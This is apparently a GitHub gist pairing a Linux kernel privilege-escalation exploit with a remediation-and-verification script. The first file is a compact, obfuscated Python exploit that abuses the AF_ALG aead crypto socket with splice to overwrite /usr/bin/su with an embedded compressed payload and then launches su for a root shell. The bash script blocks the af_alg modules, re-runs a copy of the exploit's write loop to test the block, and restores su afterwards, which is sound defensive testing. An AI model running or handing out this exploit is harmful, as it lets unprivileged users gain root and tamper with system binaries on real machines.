Skip to content

Instantly share code, notes, and snippets.

@MatMercer

MatMercer/copy_fail_exp.py

Created April 30, 2026 12:20
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save MatMercer/aab483d4a38a91d7b06ded51e0e95297 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save MatMercer/aab483d4a38a91d7b06ded51e0e95297 to your computer and use it in GitHub Desktop.
Download ZIP
copy fail exploit remediation
Raw
copy_fail_exp.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
Raw
remediate_and_verify.sh
#!/usr/bin/env bash
set -uo pipefail
BOLD='\033[1m'; RED='\033[0;31m'; GRN='\033[0;32m'; YLW='\033[0;33m'; RST='\033[0m'
ok() { echo -e "${GRN}[ OK ] $*${RST}"; }
fail(){ echo -e "${RED}[ !! ] $*${RST}"; FAILS=$((FAILS+1)); }
inf() { echo -e "${YLW}[ ** ] $*${RST}"; }
hdr() { echo -e "\n${BOLD}=== $* ===${RST}"; }
FAILS=0
MODPROBE_CONF=/etc/modprobe.d/block-af_alg.conf
EXPLOIT_TMP=/tmp/.af_alg_test_$$.py
# Always restore su from package on exit — keeps system clean regardless of result
cleanup() {
rm -f "$EXPLOIT_TMP"
inf "Restoring su from package (post-test cleanup)..."
sudo apt-get install --reinstall -y util-linux -qq 2>/dev/null && ok "su restored" || true
}
trap cleanup EXIT
# ── 1. Clean baseline ─────────────────────────────────────────────────────────
hdr "1. Establish clean baseline"
inf "Reinstalling util-linux to guarantee known-good su..."
sudo apt-get install --reinstall -y util-linux -qq
SU_MD5_BEFORE=$(md5sum /usr/bin/su | awk '{print $1}')
ok "su MD5 baseline : $SU_MD5_BEFORE"
# ── 2. Apply remediation ──────────────────────────────────────────────────────
hdr "2. Apply remediation"
inf "Writing modprobe block for af_alg and algif_aead..."
echo "install af_alg /bin/false" | sudo tee "$MODPROBE_CONF" > /dev/null
echo "install algif_aead /bin/false" | sudo tee -a "$MODPROBE_CONF" > /dev/null
ok "Created $MODPROBE_CONF"
# Must unload algif_aead first — it holds a reference on af_alg.
# rmmod af_alg will fail (silently) if algif_aead is still loaded.
inf "Unloading algif_aead (dependency) then af_alg..."
sudo rmmod algif_aead 2>/dev/null && ok "algif_aead unloaded" || ok "algif_aead was not loaded"
sudo rmmod af_alg 2>/dev/null && ok "af_alg unloaded" || ok "af_alg was not loaded"
# ── 3. Verify block is active ─────────────────────────────────────────────────
hdr "3. Verify af_alg is blocked"
SOCKET_TEST=$(python3 -c "
import socket, sys
try:
socket.socket(38, 5, 0)
print('OPEN')
except Exception as e:
print(f'BLOCKED: {e}')
" 2>&1)
if echo "$SOCKET_TEST" | grep -q 'BLOCKED'; then
ok "AF_ALG socket: $SOCKET_TEST"
else
fail "AF_ALG socket still opens — modprobe block did not take effect"
fail "Result: $SOCKET_TEST"
fi
# ── 4. Run exploit (write attempt only, no shell spawn) ───────────────────────
hdr "4. Run exploit as $(whoami) — no sudo, no shell spawn"
cat > "$EXPLOIT_TMP" << 'PYEOF'
#!/usr/bin/env python3
import os as g, zlib, socket as s, sys
def d(x): return bytes.fromhex(x)
def c(f, t, payload):
try:
a = s.socket(38, 5, 0)
except OSError as e:
print(f"AF_ALG socket blocked: {e}")
sys.exit(2) # exit 2 = socket was blocked
a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"))
h=279; v=a.setsockopt
v(h,1,d('0800010000000010'+'0'*64))
v(h,5,None,4)
u,_=a.accept(); o=t+4; i=d('00')
u.sendmsg([b"A"*4+payload],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3)],32768)
r,w=g.pipe(); n=g.splice
n(f,w,o,offset_src=0); n(r,u.fileno(),o)
try: u.recv(8+t)
except: pass
f=g.open("/usr/bin/su",0); i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4]); i+=4
# Write loop completed without being blocked — file may have been modified
print("Write loop completed — remediation did NOT block the write")
sys.exit(1) # exit 1 = write completed (bad)
PYEOF
EXPLOIT_EXIT=0
python3 "$EXPLOIT_TMP"; EXPLOIT_EXIT=$?
# ── 5. Evaluate result ────────────────────────────────────────────────────────
hdr "5. Result"
SU_MD5_AFTER=$(md5sum /usr/bin/su | awk '{print $1}')
echo " su MD5 before : $SU_MD5_BEFORE"
echo " su MD5 after : $SU_MD5_AFTER"
echo " exploit exit : $EXPLOIT_EXIT (2=socket blocked, 1=write completed, 0=unknown)"
if [[ $EXPLOIT_EXIT -eq 2 ]]; then
ok "AF_ALG socket was blocked — exploit could not start"
ok "Remediation EFFECTIVE"
elif [[ "$SU_MD5_BEFORE" != "$SU_MD5_AFTER" ]]; then
fail "su binary was MODIFIED — exploit succeeded despite remediation"
fail "Remediation FAILED — consider kernel update: sudo apt-get dist-upgrade"
else
# Write loop ran but file unchanged — kernel may have silently rejected the write
ok "Write loop ran but su is UNCHANGED — exploit had no effect"
ok "Remediation EFFECTIVE (kernel rejected the write)"
fi
# ── 6. Summary ────────────────────────────────────────────────────────────────
hdr "Summary"
echo " af_alg block : $MODPROBE_CONF (permanent — survives reboot)"
echo " su binary : will be restored from package by cleanup trap"
echo ""
if [[ $FAILS -eq 0 ]]; then
ok "All checks passed."
else
fail "$FAILS check(s) failed — review output above."
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment